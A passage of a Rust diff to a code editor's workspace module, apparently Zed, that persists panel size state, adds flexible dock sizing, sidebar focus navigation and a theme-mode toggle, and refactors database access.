dock::Dock::load_persisted_size_state(self, panel_key, cx) + } + + pub fn persist_panel_size_state( + &self, + panel_key: &str, + size_state: dock::PanelSizeState, + cx: &mut App, + ) { + let Some(workspace_id) = self + .database_id() + .map(|id| i64::from(id).to_string()) + .or(self.session_id()) + else { + return; + }; + + let kvp = db::kvp::KeyValueStore::global(cx); + let panel_key = panel_key.to_string(); + cx.background_spawn(async move { + let scope = kvp.scoped(dock::PANEL_SIZE_STATE_KEY); + scope + .write( + format!("{workspace_id}:{panel_key}"), + serde_json::to_string(&size_state)?, + ) + .await + }) + .detach_and_log_err(cx); + } + + pub fn set_panel_size_state( + &mut self, + size_state: dock::PanelSizeState, + window: &mut Window, + cx: &mut Context, + ) -> bool { + let Some(panel) = self.panel::(cx) else { + return false; + }; + + let dock = self.dock_at_position(panel.position(window, cx)); + let did_set = dock.update(cx, |dock, cx| { + dock.set_panel_size_state(&panel, size_state, cx) + }); + + if did_set { + self.persist_panel_size_state(T::panel_key(), size_state, cx); + } + + did_set + } + + pub fn toggle_dock_panel_flexible_size( + &self, + dock: &Entity, + panel: &dyn PanelHandle, + window: &mut Window, + cx: &mut App, + ) { + let position = dock.read(cx).position(); + let current_size = self.dock_size(&dock.read(cx), window, cx); + let current_flex = + current_size.and_then(|size| self.dock_flex_for_size(position, size, window, cx)); + dock.update(cx, |dock, cx| { + dock.toggle_panel_flexible_size(panel, current_size, current_flex, window, cx); + }); + } + + fn dock_size(&self, dock: &Dock, window: &Window, cx: &App) -> Option { + let panel = dock.active_panel()?; + let size_state = dock + .stored_panel_size_state(panel.as_ref()) + .unwrap_or_default(); + let position = dock.position(); + + let use_flex = panel.has_flexible_size(window, cx); + + if position.axis() == Axis::Horizontal + && use_flex + && let Some(flex) = size_state.flex.or_else(|| self.default_dock_flex(position)) + { + let workspace_width = self.bounds.size.width; + if workspace_width <= Pixels::ZERO { + return None; + } + let flex = flex.max(0.001); + let opposite = self.opposite_dock_panel_and_size_state(position, window, cx); + if let Some(opposite_flex) = opposite.as_ref().and_then(|(_, s)| s.flex) { + // Both docks are flex items sharing the full workspace width. + let total_flex = flex + 1.0 + opposite_flex; + return Some((flex / total_flex * workspace_width).max(RESIZE_HANDLE_SIZE)); + } else { + // Opposite dock is fixed-width; flex items share (W - fixed). + let opposite_fixed = opposite + .map(|(panel, s)| s.size.unwrap_or_else(|| panel.default_size(window, cx))) + .unwrap_or_default(); + let available = (workspace_width - opposite_fixed).max(RESIZE_HANDLE_SIZE); + return Some((flex / (flex + 1.0) * available).max(RESIZE_HANDLE_SIZE)); + } + } + + Some( + size_state + .size + .unwrap_or_else(|| panel.default_size(window, cx)), + ) + } + + pub fn dock_flex_for_size( + &self, + position: DockPosition, + size: Pixels, + window: &Window, + cx: &App, + ) -> Option { + if position.axis() != Axis::Horizontal { + return None; + } + + let workspace_width = self.bounds.size.width; + if workspace_width <= Pixels::ZERO { + return None; + } + + let opposite = self.opposite_dock_panel_and_size_state(position, window, cx); + if let Some(opposite_flex) = opposite.as_ref().and_then(|(_, s)| s.flex) { + let size = size.clamp(px(0.), workspace_width - px(1.)); + Some((size * (1.0 + opposite_flex) / (workspace_width - size)).max(0.0)) + } else { + let opposite_width = opposite + .map(|(panel, s)| s.size.unwrap_or_else(|| panel.default_size(window, cx))) + .unwrap_or_default(); + let available = (workspace_width - opposite_width).max(RESIZE_HANDLE_SIZE); + let remaining = (available - size).max(px(1.)); + Some((size / remaining).max(0.0)) + } + } + + fn opposite_dock_panel_and_size_state( + &self, + position: DockPosition, + window: &Window, + cx: &App, + ) -> Option<(Arc, PanelSizeState)> { + let opposite_position = match position { + DockPosition::Left => DockPosition::Right, + DockPosition::Right => DockPosition::Left, + DockPosition::Bottom => return None, + }; + + let opposite_dock = self.dock_at_position(opposite_position).read(cx); + let panel = opposite_dock.visible_panel()?; + let mut size_state = opposite_dock + .stored_panel_size_state(panel.as_ref()) + .unwrap_or_default(); + if size_state.flex.is_none() && panel.has_flexible_size(window, cx) { + size_state.flex = self.default_dock_flex(opposite_position); + } + Some((panel.clone(), size_state)) + } + + pub fn default_dock_flex(&self, position: DockPosition) -> Option { + if position.axis() != Axis::Horizontal { + return None; + } + + let pane = self.last_active_center_pane.clone()?.upgrade()?; + Some(self.center.width_fraction_for_pane(&pane).unwrap_or(1.0)) + } + pub fn is_edited(&self) -> bool { self.window_edited } @@ -2007,10 +2397,29 @@ impl Workspace { let dock_position = panel.position(window, cx); let dock = self.dock_at_position(dock_position); + let any_panel = panel.to_any(); + let persisted_size_state = + self.persisted_panel_size_state(T::panel_key(), cx) + .or_else(|| { + load_legacy_panel_size(T::panel_key(), dock_position, self, cx).map(|size| { + let state = dock::PanelSizeState { + size: Some(size), + flex: None, + }; + self.persist_panel_size_state(T::panel_key(), state, cx); + state + }) + }); dock.update(cx, |dock, cx| { - dock.add_panel(panel, self.weak_self.clone(), window, cx) + let index = dock.add_panel(panel.clone(), self.weak_self.clone(), window, cx); + if let Some(size_state) = persisted_size_state { + dock.set_panel_size_state(&panel, size_state, cx); + } + index }); + + cx.emit(Event::PanelAdded(any_panel)); } pub fn remove_panel( @@ -2028,20 +2437,41 @@ impl Workspace { &self.status_bar } - pub fn set_workspace_sidebar_open(&self, open: bool, cx: &mut App) { - self.status_bar.update(cx, |status_bar, cx| { - status_bar.set_workspace_sidebar_open(open, cx); - }); + pub fn set_sidebar_focus_handle(&mut self, handle: Option) { + self.sidebar_focus_handle = handle; } pub fn status_bar_visible(&self, cx: &App) -> bool { StatusBarSettings::get_global(cx).show } + pub fn multi_workspace(&self) -> Option<&WeakEntity> { + self.multi_workspace.as_ref() + } + + pub fn set_multi_workspace( + &mut self, + multi_workspace: WeakEntity, + cx: &mut App, + ) { + self.status_bar.update(cx, |status_bar, cx| { + status_bar.set_multi_workspace(multi_workspace.clone(), cx); + }); + self.multi_workspace = Some(multi_workspace); + } + pub fn app_state(&self) -> &Arc { &self.app_state } + pub fn set_panels_task(&mut self, task: Task>) { + self._panels_task = Some(task); + } + + pub fn take_panels_task(&mut self) -> Option>> { + self._panels_task.take() + } + pub fn user_store(&self) -> &Entity { &self.app_state.user_store } @@ -2395,6 +2825,18 @@ impl Workspace { self.debugger_provider = Some(Arc::new(provider)); } + pub fn set_open_in_dev_container(&mut self, value: bool) { + self.open_in_dev_container = value; + } + + pub fn open_in_dev_container(&self) -> bool { + self.open_in_dev_container + } + + pub fn set_dev_container_task(&mut self, task: Task>) { + self._dev_container_task = Some(task); + } + pub fn debugger_provider(&self) -> Option> { self.debugger_provider.clone() } @@ -2547,9 +2989,20 @@ impl Workspace { Task::ready(Ok(callback(self, window, cx))) } else { let env = self.project.read(cx).cli_environment(cx); - let task = Self::new_local(Vec::new(), self.app_state.clone(), None, env, None, cx); + let task = Self::new_local( + Vec::new(), + self.app_state.clone(), + None, + env, + None, + OpenMode::Activate, + cx, + ); cx.spawn_in(window, async move |_vh, cx| { - let (multi_workspace_window, _) = task.await?; + let OpenResult { + window: multi_workspace_window, + .. + } = task.await?; multi_workspace_window.update(cx, |multi_workspace, window, cx| { let workspace = multi_workspace.workspace().clone(); workspace.update(cx, |workspace, cx| callback(workspace, window, cx)) @@ -2577,9 +3030,20 @@ impl Workspace { Task::ready(Ok(callback(self, window, cx))) } else { let env = self.project.read(cx).cli_environment(cx); - let task = Self::new_local(Vec::new(), self.app_state.clone(), None, env, None, cx); + let task = Self::new_local( + Vec::new(), + self.app_state.clone(), + None, + env, + None, + OpenMode::Activate, + cx, + ); cx.spawn_in(window, async move |_vh, cx| { - let (multi_workspace_window, _) = task.await?; + let OpenResult { + window: multi_workspace_window, + .. + } = task.await?; multi_workspace_window.update(cx, |multi_workspace, window, cx| { let workspace = multi_workspace.workspace().clone(); workspace.update(cx, |workspace, cx| callback(workspace, window, cx)) @@ -2599,7 +3063,6 @@ impl Workspace { self.project.read(cx).visible_worktrees(cx) } - #[cfg(any(test, feature = "test-support"))] pub fn worktree_scans_complete(&self, cx: &App) -> impl Future + 'static + use<> { let futures = self .worktrees(cx) @@ -2820,13 +3283,15 @@ impl Workspace { .spawn(cx, async move |cx| { // limit to 100 keystrokes to avoid infinite recursion. for _ in 0..100 { - let mut state = keystrokes.borrow_mut(); - let Some(keystroke) = state.queue.pop_front() else { - state.dispatched.clear(); - state.task.take(); - return; + let keystroke = { + let mut state = keystrokes.borrow_mut(); + let Some(keystroke) = state.queue.pop_front() else { + state.dispatched.clear(); + state.task.take(); + return; + }; + keystroke }; - drop(state); cx.update(|window, cx| { let focused = window.focused(cx); window.dispatch_keystroke(keystroke.clone(), cx); @@ -2841,6 +3306,10 @@ impl Workspace { } }) .ok(); + + // Yield between synthetic keystrokes so deferred focus and + // other effects can settle before dispatching the next key. + yield_now().await; } *keystrokes.borrow_mut() = Default::default(); @@ -2948,39 +3417,40 @@ impl Workspace { pub fn open_workspace_for_paths( &mut self, - replace_current_window: bool, + // replace_current_window: bool, + mut open_mode: OpenMode, paths: Vec, window: &mut Window, cx: &mut Context, - ) -> Task> { - let window_handle = window.window_handle().downcast::(); + ) -> Task>> { + let requesting_window = window.window_handle().downcast::(); let is_remote = self.project.read(cx).is_via_collab(); let has_worktree = self.project.read(cx).worktrees(cx).next().is_some(); let has_dirty_items = self.items(cx).any(|item| item.is_dirty(cx)); - let window_to_replace = if replace_current_window { - window_handle - } else if is_remote || has_worktree || has_dirty_items { - None - } else { - window_handle - }; + let workspace_is_empty = !is_remote && !has_worktree && !has_dirty_items; + if workspace_is_empty { + open_mode = OpenMode::Activate; + } + let app_state = self.app_state.clone(); cx.spawn(async move |_, cx| { - cx.update(|cx| { - open_paths( - &paths, - app_state, - OpenOptions { - replace_window: window_to_replace, - ..Default::default() - }, - cx, - ) - }) - .await?; - Ok(()) + let OpenResult { workspace, .. } = cx + .update(|cx| { + open_paths( + &paths, + app_state, + OpenOptions { + requesting_window, + open_mode, + ..Default::default() + }, + cx, + ) + }) + .await?; + Ok(workspace) }) } @@ -3185,7 +3655,7 @@ impl Workspace { .map(|wt| wt.read(cx).abs_path().as_ref().to_path_buf()) } - fn add_folder_to_project( + pub fn add_folder_to_project( &mut self, _: &AddFolderToProject, window: &mut Window, @@ -3663,6 +4133,14 @@ impl Workspace { did_focus_panel } + pub fn focus_center_pane(&mut self, window: &mut Window, cx: &mut Context) { + if let Some(item) = self.active_item(cx) { + item.item_focus_handle(cx).focus(window, cx); + } else { + log::error!("Could not find a focus target when switching focus to the center panes",); + } + } + pub fn activate_panel_for_proto_id( &mut self, panel_id: PanelId, @@ -3747,6 +4225,17 @@ impl Workspace { } } + /// Open the panel of the given type, dismissing any zoomed items that + /// would obscure it (e.g. a zoomed terminal). + pub fn reveal_panel(&mut self, window: &mut Window, cx: &mut Context) { + let dock_position = self.all_docks().iter().find_map(|dock| { + let dock = dock.read(cx); + dock.panel_index_for_type::().map(|_| dock.position()) + }); + self.dismiss_zoomed_items_to_reveal(dock_position, window, cx); + self.open_panel::(window, cx); + } + pub fn close_panel(&self, window: &mut Window, cx: &mut Context) { for dock in self.all_docks().iter() { dock.update(cx, |dock, cx| { @@ -4307,27 +4796,36 @@ impl Workspace { ) { use ActivateInDirectionTarget as Target; enum Origin { + Sidebar, LeftDock, RightDock, BottomDock, Center, } - let origin: Origin = [ - (&self.left_dock, Origin::LeftDock), - (&self.right_dock, Origin::RightDock), - (&self.bottom_dock, Origin::BottomDock), - ] - .into_iter() - .find_map(|(dock, origin)| { - if dock.focus_handle(cx).contains_focused(window, cx) && dock.read(cx).is_open() { - Some(origin) - } else { - None - } - }) - .unwrap_or(Origin::Center); - + let origin: Origin = if self + .sidebar_focus_handle + .as_ref() + .is_some_and(|h| h.contains_focused(window, cx)) + { + Origin::Sidebar + } else { + [ + (&self.left_dock, Origin::LeftDock), + (&self.right_dock, Origin::RightDock), + (&self.bottom_dock, Origin::BottomDock), + ] + .into_iter() + .find_map(|(dock, origin)| { + if dock.focus_handle(cx).contains_focused(window, cx) && dock.read(cx).is_open() { + Some(origin) + } else { + None + } + }) + .unwrap_or(Origin::Center) + }; + let get_last_active_pane = || { let pane = self .last_active_center_pane @@ -4345,7 +4843,20 @@ impl Workspace { let try_dock = |dock: &Entity| dock.read(cx).is_open().then(|| Target::Dock(dock.clone())); + let sidebar_target = self + .sidebar_focus_handle + .as_ref() + .map(|h| Target::Sidebar(h.clone())); + let target = match (origin, direction) { + // From the sidebar, only Right navigates into the workspace. + (Origin::Sidebar, SplitDirection::Right) => try_dock(&self.left_dock) + .or_else(|| get_last_active_pane().map(Target::Pane)) + .or_else(|| try_dock(&self.bottom_dock)) + .or_else(|| try_dock(&self.right_dock)), + + (Origin::Sidebar, _) => None, + // We're in the center, so we first try to go to a different pane, // otherwise try to go to a dock. (Origin::Center, direction) => { @@ -4355,7 +4866,7 @@ impl Workspace { match direction { SplitDirection::Up => None, SplitDirection::Down => try_dock(&self.bottom_dock), - SplitDirection::Left => try_dock(&self.left_dock), + SplitDirection::Left => try_dock(&self.left_dock).or(sidebar_target), SplitDirection::Right => try_dock(&self.right_dock), } } @@ -4369,18 +4880,24 @@ impl Workspace { } } + (Origin::LeftDock, SplitDirection::Left) => sidebar_target, + (Origin::LeftDock, SplitDirection::Down) | (Origin::RightDock, SplitDirection::Down) => try_dock(&self.bottom_dock), (Origin::BottomDock, SplitDirection::Up) => get_last_active_pane().map(Target::Pane), - (Origin::BottomDock, SplitDirection::Left) => try_dock(&self.left_dock), + (Origin::BottomDock, SplitDirection::Left) => { + try_dock(&self.left_dock).or(sidebar_target) + } (Origin::BottomDock, SplitDirection::Right) => try_dock(&self.right_dock), (Origin::RightDock, SplitDirection::Left) => { if let Some(last_active_pane) = get_last_active_pane() { Some(Target::Pane(last_active_pane)) } else { - try_dock(&self.bottom_dock).or_else(|| try_dock(&self.left_dock)) + try_dock(&self.bottom_dock) + .or_else(|| try_dock(&self.left_dock)) + .or(sidebar_target) } } @@ -4409,6 +4926,9 @@ impl Workspace { } }) } + Some(ActivateInDirectionTarget::Sidebar(focus_handle)) => { + focus_handle.focus(window, cx); + } None => {} } } @@ -4503,11 +5023,12 @@ impl Workspace { .into_iter() .find(|dock| dock.focus_handle(cx).contains_focused(window, cx)); - if let Some(dock) = active_dock { - let Some(panel_size) = dock.read(cx).active_panel_size(window, cx) else { + if let Some(dock_entity) = active_dock { + let dock = dock_entity.read(cx); + let Some(panel_size) = self.dock_size(&dock, window, cx) else { return; }; - match dock.read(cx).position() { + match dock.position() { DockPosition::Left => self.resize_left_dock(panel_size + amount, window, cx), DockPosition::Bottom => self.resize_bottom_dock(panel_size + amount, window, cx), DockPosition::Right => self.resize_right_dock(panel_size + amount, window, cx), @@ -5043,7 +5564,9 @@ impl Workspace { if let Some(project_id) = other_project_id { let app_state = self.app_state.clone(); crate::join_in_room_project(project_id, remote_participant.user.id, app_state, cx) - .detach_and_log_err(cx); + .detach_and_prompt_err("Failed to join project", window, cx, |error, _, _| { + Some(format!("{error:#}")) + }); } } @@ -5768,7 +6291,8 @@ impl Workspace { self.update_active_view_for_followers(window, cx); if let Some(database_id) = self.database_id { - cx.background_spawn(persistence::DB.update_timestamp(database_id)) + let db = WorkspaceDb::global(cx); + cx.background_spawn(async move { db.update_timestamp(database_id).await }) .detach(); } } else { @@ -5817,6 +6341,7 @@ impl Workspace { self.database_id } + #[cfg(any(test, feature = "test-support"))] pub(crate) fn set_database_id(&mut self, id: WorkspaceId) { self.database_id = Some(id); } @@ -5836,15 +6361,17 @@ impl Workspace { let window_bounds = window.inner_window_bounds(); let database_id = self.database_id; let has_paths = !self.root_paths(cx).is_empty(); + let db = WorkspaceDb::global(cx); + let kvp = db::kvp::KeyValueStore::global(cx); cx.background_executor().spawn(async move { if !has_paths { - persistence::write_default_window_bounds(window_bounds, display_uuid) + persistence::write_default_window_bounds(&kvp, window_bounds, display_uuid) .await .log_err(); } if let Some(database_id) = database_id { - DB.set_window_open_status( + db.set_window_open_status( database_id, SerializedWindowBounds(window_bounds), display_uuid, @@ -5852,7 +6379,7 @@ impl Workspace { .await .log_err(); } else { - persistence::write_default_window_bounds(window_bounds, display_uuid) + persistence::write_default_window_bounds(&kvp, window_bounds, display_uuid) .await .log_err(); } @@ -6005,53 +6532,7 @@ impl Workspace { window: &mut Window, cx: &mut App, ) -> DockStructure { - let left_dock = this.left_dock.read(cx); - let left_visible = left_dock.is_open(); - let left_active_panel = left_dock - .active_panel() - .map(|panel| panel.persistent_name().to_string()); - let left_dock_zoom = left_dock - .active_panel() - .map(|panel| panel.is_zoomed(window, cx)) - .unwrap_or(false); - - let right_dock = this.right_dock.read(cx); - let right_visible = right_dock.is_open(); - let right_active_panel = right_dock - .active_panel() - .map(|panel| panel.persistent_name().to_string()); - let right_dock_zoom = right_dock - .active_panel() - .map(|panel| panel.is_zoomed(window, cx)) - .unwrap_or(false); - - let bottom_dock = this.bottom_dock.read(cx); - let bottom_visible = bottom_dock.is_open(); - let bottom_active_panel = bottom_dock - .active_panel() - .map(|panel| panel.persistent_name().to_string()); - let bottom_dock_zoom = bottom_dock - .active_panel() - .map(|panel| panel.is_zoomed(window, cx)) - .unwrap_or(false); - - DockStructure { - left: DockData { - visible: left_visible, - active_panel: left_active_panel, - zoom: left_dock_zoom, - }, - right: DockData { - visible: right_visible, - active_panel: right_active_panel, - zoom: right_dock_zoom, - }, - bottom: DockData { - visible: bottom_visible, - active_panel: bottom_active_panel, - zoom: bottom_dock_zoom, - }, - } + this.capture_dock_state(window, cx) } match self.workspace_location(cx) { @@ -6087,8 +6568,9 @@ impl Workspace { user_toolchains, }; + let db = WorkspaceDb::global(cx); window.spawn(cx, async move |_| { - persistence::DB.save_workspace(serialized_workspace).await; + db.save_workspace(serialized_workspace).await; }) } WorkspaceLocation::DetachFromSession => { @@ -6096,27 +6578,30 @@ impl Workspace { let display = window.display(cx).and_then(|d| d.uuid().ok()); // Save dock state for empty local workspaces let docks = build_serialized_docks(self, window, cx); + let db = WorkspaceDb::global(cx); + let kvp = db::kvp::KeyValueStore::global(cx); window.spawn(cx, async move |_| { - persistence::DB - .set_window_open_status( - database_id, - window_bounds, - display.unwrap_or_default(), - ) - .await - .log_err(); - persistence::DB - .set_session_id(database_id, None) + db.set_window_open_status( + database_id, + window_bounds, + display.unwrap_or_default(), + ) + .await + .log_err(); + db.set_session_id(database_id, None).await.log_err(); + persistence::write_default_dock_state(&kvp, docks) .await .log_err(); - persistence::write_default_dock_state(docks).await.log_err(); }) } WorkspaceLocation::None => { // Save dock state for empty non-local workspaces let docks = build_serialized_docks(self, window, cx); + let kvp = db::kvp::KeyValueStore::global(cx); window.spawn(cx, async move |_| { - persistence::write_default_dock_state(docks).await.log_err(); + persistence::write_default_dock_state(&kvp, docks) + .await + .log_err(); }) } } @@ -6395,6 +6880,7 @@ impl Workspace { .on_action(cx.listener(Self::move_item_to_pane_at_index)) .on_action(cx.listener(Self::move_focused_panel_to_next_position)) .on_action(cx.listener(Self::toggle_edit_predictions_all_files)) + .on_action(cx.listener(Self::toggle_theme_mode)) .on_action(cx.listener(|workspace, _: &Unfollow, window, cx| { let pane = workspace.active_pane().clone(); workspace.unfollow_in_pane(&pane, window, cx); @@ -6545,9 +7031,9 @@ impl Workspace { trusted_worktrees.update(cx, |trusted_worktrees, _| { trusted_worktrees.clear_trusted_paths() }); - let clear_task = persistence::DB.clear_trusted_worktrees(); + let db = WorkspaceDb::global(cx); cx.spawn(async move |_, cx| { - if clear_task.await.log_err().is_some() { + if db.clear_trusted_worktrees().await.log_err().is_some() { cx.update(|cx| reload(cx)); } }) @@ -6564,24 +7050,33 @@ impl Workspace { |workspace: &mut Workspace, _: &ResetActiveDockSize, window, cx| { for dock in workspace.all_docks() { if dock.focus_handle(cx).contains_focused(window, cx) { - let Some(panel) = dock.read(cx).active_panel() else { - return; - }; - - // Set to `None`, then the size will fall back to the default. - panel.clone().set_size(None, window, cx); - + let panel = dock.read(cx).active_panel().cloned(); + if let Some(panel) = panel { + dock.update(cx, |dock, cx| { + dock.set_panel_size_state( + panel.as_ref(), + dock::PanelSizeState::default(), + cx, + ); + }); + } return; } } }, )) .on_action(cx.listener( - |workspace: &mut Workspace, _: &ResetOpenDocksSize, window, cx| { + |workspace: &mut Workspace, _: &ResetOpenDocksSize, _window, cx| { for dock in workspace.all_docks() { - if let Some(panel) = dock.read(cx).visible_panel() { - // Set to `None`, then the size will fall back to the default. - panel.clone().set_size(None, window, cx); + let panel = dock.read(cx).visible_panel().cloned(); + if let Some(panel) = panel { + dock.update(cx, |dock, cx| { + dock.set_panel_size_state( + panel.as_ref(), + dock::PanelSizeState::default(), + cx, + ); + }); } } }, @@ -6628,7 +7123,7 @@ impl Workspace { )) .on_action(cx.listener(Workspace::toggle_centered_layout)) .on_action(cx.listener( - |workspace: &mut Workspace, _action: &pane::ActivateNextItem, window, cx| { + |workspace: &mut Workspace, action: &pane::ActivateNextItem, window, cx| { if let Some(active_dock) = workspace.active_dock(window, cx) { let dock = active_dock.read(cx); if let Some(active_panel) = dock.active_panel() { @@ -6646,14 +7141,17 @@ impl Workspace { } if let Some(pane) = recent_pane { + let wrap_around = action.wrap_around; pane.update(cx, |pane, cx| { let current_index = pane.active_item_index(); let items_len = pane.items_len(); if items_len > 0 { let next_index = if current_index + 1 < items_len { current_index + 1 - } else { + } else if wrap_around { 0 + } else { + return; }; pane.activate_item( next_index, false, false, window, cx, @@ -6669,7 +7167,7 @@ impl Workspace { }, )) .on_action(cx.listener( - |workspace: &mut Workspace, _action: &pane::ActivatePreviousItem, window, cx| { + |workspace: &mut Workspace, action: &pane::ActivatePreviousItem, window, cx| { if let Some(active_dock) = workspace.active_dock(window, cx) { let dock = active_dock.read(cx); if let Some(active_panel) = dock.active_panel() { @@ -6687,14 +7185,17 @@ impl Workspace { } if let Some(pane) = recent_pane { + let wrap_around = action.wrap_around; pane.update(cx, |pane, cx| { let current_index = pane.active_item_index(); let items_len = pane.items_len(); if items_len > 0 { let prev_index = if current_index > 0 { current_index - 1 - } else { + } else if wrap_around { items_len.saturating_sub(1) + } else { + return; }; pane.activate_item( prev_index, false, false, window, cx, @@ -6735,6 +7236,9 @@ impl Workspace { } }), ) + .on_action(cx.listener(|workspace, _: &FocusCenterPane, window, cx| { + workspace.focus_center_pane(window, cx); + })) .on_action(cx.listener(Workspace::cancel)) } @@ -6812,6 +7316,12 @@ impl Workspace { self.modal_layer.read(cx).has_active_modal() } + pub fn is_active_modal_command_palette(&self, cx: &mut App) -> bool { + self.modal_layer + .read(cx) + .is_active_modal_command_palette(cx) + } + pub fn active_modal(&self, cx: &App) -> Option> { self.modal_layer.read(cx).active_modal() } @@ -6850,8 +7360,12 @@ impl Workspace { ) { self.centered_layout = !self.centered_layout; if let Some(database_id) = self.database_id() { - cx.background_spawn(DB.set_centered_layout(database_id, self.centered_layout)) - .detach_and_log_err(cx); + let db = WorkspaceDb::global(cx); + let centered_layout = self.centered_layout; + cx.background_spawn(async move { + db.set_centered_layout(database_id, centered_layout).await + }) + .detach_and_log_err(cx); } cx.notify(); } @@ -6882,14 +7396,49 @@ impl Workspace { leader_border_for_pane(follower_states, &pane, window, cx) }); - Some( - div() - .flex() - .flex_none() - .overflow_hidden() - .child(dock.clone()) - .children(leader_border), - ) + let mut container = div() + .flex() + .overflow_hidden() + .flex_none() + .child(dock.clone()) + .children(leader_border); + + // Apply sizing only when the dock is open. When closed the dock is still + // included in the element tree so its focus handle remains mounted — without + // this, toggle_panel_focus cannot focus the panel when the dock is closed. + let dock = dock.read(cx); + if let Some(panel) = dock.visible_panel() { + let size_state = dock.stored_panel_size_state(panel.as_ref()); + if position.axis() == Axis::Horizontal { + let use_flexible = panel.has_flexible_size(window, cx); + let flex_grow = if use_flexible { + size_state + .and_then(|state| state.flex) + .or_else(|| self.default_dock_flex(position)) + } else { + None + }; + if let Some(grow) = flex_grow { + let grow = grow.max(0.001); + let style = container.style(); + style.flex_grow = Some(grow); + style.flex_shrink = Some(1.0); + style.flex_basis = Some(relative(0.).into()); + } else { + let size = size_state + .and_then(|state| state.size) + .unwrap_or_else(|| panel.default_size(window, cx)); + container = container.w(size); + } + } else { + let size = size_state + .and_then(|state| state.size) + .unwrap_or_else(|| panel.default_size(window, cx)); + container = container.h(size); + } + } + + Some(container) } pub fn for_window(window: &Window, cx: &App) -> Option> { @@ -6959,54 +7508,66 @@ impl Workspace { } } - fn adjust_dock_size_by_px( + fn resize_dock( &mut self, - panel_size: Pixels, dock_pos: DockPosition, - px: Pixels, + new_size: Pixels, window: &mut Window, cx: &mut Context, ) { match dock_pos { - DockPosition::Left => self.resize_left_dock(panel_size + px, window, cx), - DockPosition::Right => self.resize_right_dock(panel_size + px, window, cx), - DockPosition::Bottom => self.resize_bottom_dock(panel_size + px, window, cx), + DockPosition::Left => self.resize_left_dock(new_size, window, cx), + DockPosition::Right => self.resize_right_dock(new_size, window, cx), + DockPosition::Bottom => self.resize_bottom_dock(new_size, window, cx), } } fn resize_left_dock(&mut self, new_size: Pixels, window: &mut Window, cx: &mut App) { - let size = new_size.min(self.bounds.right() - RESIZE_HANDLE_SIZE); + let workspace_width = self.bounds.size.width; + let mut size = new_size.min(workspace_width - RESIZE_HANDLE_SIZE); + + self.right_dock.read_with(cx, |right_dock, cx| { + let right_dock_size = right_dock + .stored_active_panel_size(window, cx) + .unwrap_or(Pixels::ZERO); + if right_dock_size + size > workspace_width { + size = workspace_width - right_dock_size + } + }); + let flex_grow = self.dock_flex_for_size(DockPosition::Left, size, window, cx); self.left_dock.update(cx, |left_dock, cx| { if WorkspaceSettings::get_global(cx) .resize_all_panels_in_dock .contains(&DockPosition::Left) { - left_dock.resize_all_panels(Some(size), window, cx); + left_dock.resize_all_panels(Some(size), flex_grow, window, cx); } else { - left_dock.resize_active_panel(Some(size), window, cx); + left_dock.resize_active_panel(Some(size), flex_grow, window, cx); } }); } fn resize_right_dock(&mut self, new_size: Pixels, window: &mut Window, cx: &mut App) { - let mut size = new_size.max(self.bounds.left() - RESIZE_HANDLE_SIZE); + let workspace_width = self.bounds.size.width; + let mut size = new_size.min(workspace_width - RESIZE_HANDLE_SIZE); self.left_dock.read_with(cx, |left_dock, cx| { let left_dock_size = left_dock - .active_panel_size(window, cx) + .stored_active_panel_size(window, cx) .unwrap_or(Pixels::ZERO); - if left_dock_size + size > self.bounds.right() { - size = self.bounds.right() - left_dock_size + if left_dock_size + size > workspace_width { + size = workspace_width - left_dock_size } }); + let flex_grow = self.dock_flex_for_size(DockPosition::Right, size, window, cx); self.right_dock.update(cx, |right_dock, cx| { if WorkspaceSettings::get_global(cx) .resize_all_panels_in_dock .contains(&DockPosition::Right) { - right_dock.resize_all_panels(Some(size), window, cx); + right_dock.resize_all_panels(Some(size), flex_grow, window, cx); } else { - right_dock.resize_active_panel(Some(size), window, cx); + right_dock.resize_active_panel(Some(size), flex_grow, window, cx); } }); } @@ -7018,9 +7579,9 @@ impl Workspace { .resize_all_panels_in_dock .contains(&DockPosition::Bottom) { - bottom_dock.resize_all_panels(Some(size), window, cx); + bottom_dock.resize_all_panels(Some(size), None, window, cx); } else { - bottom_dock.resize_active_panel(Some(size), window, cx); + bottom_dock.resize_active_panel(Some(size), None, window, cx); } }); } @@ -7038,6 +7599,29 @@ impl Workspace { }); } + fn toggle_theme_mode(&mut self, _: &ToggleMode, _window: &mut Window, cx: &mut Context) { + let current_mode = ThemeSettings::get_global(cx).theme.mode(); + let next_mode = match current_mode { + Some(theme_settings::ThemeAppearanceMode::Light) => { + theme_settings::ThemeAppearanceMode::Dark + } + Some(theme_settings::ThemeAppearanceMode::Dark) => { + theme_settings::ThemeAppearanceMode::Light + } + Some(theme_settings::ThemeAppearanceMode::System) | None => { + match cx.theme().appearance() { + theme::Appearance::Light => theme_settings::ThemeAppearanceMode::Dark, + theme::Appearance::Dark => theme_settings::ThemeAppearanceMode::Light, + } + } + }; + + let fs = self.project().read(cx).fs().clone(); + settings::update_settings_file(fs, cx, move |settings, _cx| { + theme_settings::set_mode(settings, next_mode); + }); + } + pub fn show_worktree_trust_security_modal( &mut self, toggle: bool, @@ -7129,6 +7713,7 @@ impl GlobalAnyActiveCall { cx.global() } } + /// Workspace-local view of a remote participant's location. #[derive(Clone, Copy, Debug, PartialEq, Eq)] pub enum ParticipantLocation { @@ -7321,9 +7906,11 @@ fn open_items( }) } +#[derive(Clone)] enum ActivateInDirectionTarget { Pane(Entity), Dock(Entity), + Sidebar(FocusHandle), } fn notify_if_database_failed(window: WindowHandle, cx: &mut AsyncApp) { @@ -7376,11 +7963,10 @@ fn adjust_active_dock_size_by_px( return; }; let dock = active_dock.read(cx); - let Some(panel_size) = dock.active_panel_size(window, cx) else { + let Some(panel_size) = workspace.dock_size(&dock, window, cx) else { return; }; - let dock_pos = dock.position(); - workspace.adjust_dock_size_by_px(panel_size, dock_pos, px, window, cx); + workspace.resize_dock(dock.position(), panel_size + px, window, cx); } fn adjust_open_docks_size_by_px( @@ -7392,23 +7978,21 @@ fn adjust_open_docks_size_by_px( let docks = workspace .all_docks() .into_iter() - .filter_map(|dock| { - if dock.read(cx).is_open() { - let dock = dock.read(cx); - let panel_size = dock.active_panel_size(window, cx)?; + .filter_map(|dock_entity| { + let dock = dock_entity.read(cx); + if dock.is_open() { let dock_pos = dock.position(); - Some((panel_size, dock_pos, px)) + let panel_size = workspace.dock_size(&dock, window, cx)?; + Some((dock_pos, panel_size + px)) } else { None } }) .collect::>(); - docks - .into_iter() - .for_each(|(panel_size, dock_pos, offset)| { - workspace.adjust_dock_size_by_px(panel_size, dock_pos, offset, window, cx); - }); + for (position, new_size) in docks { + workspace.resize_dock(position, new_size, window, cx); + } } impl Focusable for Workspace { @@ -7458,7 +8042,7 @@ impl Render for Workspace { } else { 